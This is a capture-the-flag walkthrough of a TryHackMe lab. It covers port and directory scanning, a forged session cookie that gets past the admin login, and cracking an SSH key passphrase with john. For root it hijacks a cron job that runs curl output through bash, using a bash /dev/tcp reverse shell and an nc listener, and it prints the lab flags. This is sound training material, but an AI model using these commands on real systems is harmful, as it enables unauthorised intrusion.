BabsStarted by running an nmap scan with the command below in order to discover available ports:
nmap -A -p- 10.10.76.67
From the image above we can see that port 22, port 80 and port 31448 are open.
The next thing I did was to visit the webpage of the IP address 10.10.76.67 on my web-browser
After much enumeration there wasn't much I found on the page so the next step for me was to use ffuf to find some hidden web directories.
And to do that I used the command:
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://10.10.76.67/FUZZ
From our search we could see that an admin page is available, so all I needed to do was to visit the admin web page and I did that on my browser using the domain name:
10.10.76.67/admin
A default login page is shown, I couldn't find a login password so I decided to check the view page source by using the right click button.
The login.js above actually represents a file that was hidden in the view page source spot.
So I clicked on it and was re-directed to another page which is shown below.
The above image shows that this page makes a post-request to "/api/login" with a specific username and password.
The vulnerability here is that the session of the login to the admin page has already been verified, so we need to use the cookie session seen.
To do that we need to steal the cookie session token as highlighted in the image below, copy it and have it pasted somewhere.
Now the next step is to open the developer tool by right clicking on your device and selecting the "inspect" option as seen in the image below.
Then select storage from the options as seen in the image below
Now we need to create a session token cookie with the session token copied earlier which was "SessionToken" and give it any value of how choice.
To do that click on the + button as seen below
Then change the name to the session token copied earlier.
NB- It is not showing the "S" because of the view size, but note that the "S" is there, so make sure it is properly copied and pasted.
The value was changed to "hacker" as seen above but it can be changed to any word of your choice.
Then refresh the page.
You would have successfully stolen a login cookie and would be logged in as seen in the image below.
The image above shows an encrypted RSA key in which we need to decrypt using john the ripper.
So we need to first copy the rsa key and convert the key to a hash john can work with, and to do that we copy the key and store in a file.
For me I'd be storing it in a file named "id_rsa"
So after copying the key as seen above, then input the command below to save the file:
nano id_rsa
Press enter and then paste the encrypted key copied and save.
Input the command below to locate the file path of ssh2john because we need ssh2john in order to convert the hash we got to a hash john-the-ripper can crack:
locate ssh2john
Copy the "/usr/share/john/ssh2john.py" path
Use the command below to convert the hash and save it to a file named hash:
/usr/share/john/ssh2john.py id_rsa > hash
Then input the command below to crack the hash using john with rockyou.txt wordlist.
john hash --wordlist=/usr/share/wordlists/rockyou.txt
We got the output "james13" as the password
Now we go back to the admin page.
From the above we can see that the user is james and we have cracked the password which is "james13"
And from the image we can see that an ssh login has been set up for the user james so we know the username and password for the ssh login of the user james.
To ssh we need to change the permission of the id_rsa file using the command:
chmod 600 id_rsa
Then use the command to ssh into james account:
ssh -i id_rsa james@10.10.21.149
For the passphrase use the passphrase "james13" to login.
We have successfully logged into james account.
input the command below to find the user's file:
cat user.txt
The flag is "thm{65c1aaf000506e56996822c6281e6bf7}"
Now we need to escalate the user's privilege in order to get the root's flag.
After checking what was in the todo.txt file, we can see that there is an automated tasks that is running continuously as seen from the image below
We can confirm that by checking our crontab using the command:
cat /etc/crontab
The above indicated is the task we are interested in because it uses curl to fetch the script and pipes it to bash to execute it.
Use the command:
cat /etc/hosts
As seen above the overpass.thm domain points to the local host, but we need to replace it with the IP address of our vulnerable machine.
Input the command below:
nano /etc/hosts
Then change the IP address to the vulnerable machine's IP
Now input the command below on your attack box machine:
NB- Do not do so on james login session.
mkdir -p downloads/src/
Now input the command:
nano downloads/src/buildscript.sh
And paste the command below into the script.
bash -i >& /dev/tcp/10.9.1.128/1337 0>&1
NB- Remember to change the IP address to your attack machine's IP address
Save and exit the nano script.
Open a new tab and set up a netcat listener using the command:
nc -nvlp 1337
Then host up a web server on another tab using the command:
python3 -m http.server 80
Root has been successfully achieved
The flag for root is:
thm{7f336f8c359dbac18d54fdd64ea753bb}
CHALLENGES YOU MIGHT FACE
You might face challenges with understanding the IP address, kindly note that room was gotten from TRYHACKME and the vulnerable machine's IP address is the IP address of the machine you spawned.
And your attacking machine's IP address is the IP address given to you by TRYHACKME after you connected using openvpn.
It is also the IP address of your tun0 when checked on kali
Happy Hacking!!!
It was written as an easy room but it definitely wasn't easy!
